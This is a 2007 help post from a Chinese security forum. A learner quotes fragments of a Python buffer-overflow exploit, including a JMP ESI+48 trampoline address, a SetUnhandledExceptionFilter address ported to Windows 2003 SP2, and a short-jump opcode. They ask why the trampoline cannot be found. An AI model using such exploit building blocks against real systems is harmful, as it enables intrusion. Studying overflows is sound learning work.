[求助]学习溢出，一个跳板找不到-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [求助]学习溢出，一个跳板找不到 0.00雪花

发表于: 2007-12-21 15:07 2492

[旧帖] [求助]学习溢出，一个跳板找不到 0.00雪花

famu

2007-12-21 15:07

2492

代码来源
696K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5%4g2J5K9i4c8&6k6X3!0U0N6i4y4Q4x3X3g2U0L8$3#2Q4x3V1k6T1K9h3c8Q4x3V1j5I4z5e0j5#2x3g2)9J5c8X3g2^5M7r3I4G2K9i4b7`.

#此处他说的jmp ESI+48的地址在Win2003中找不到，而且我只找到advapi32.dll文件，没有发现advapi.dll这个文件
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches

#ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
#这个我已经找到win2003下的替换地址了
ueh = struct.pack("<L",0x7C842060) # SetUnhandledExceptionFilter 0x7C842060 win2003 SP2 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・0

免费・0

支持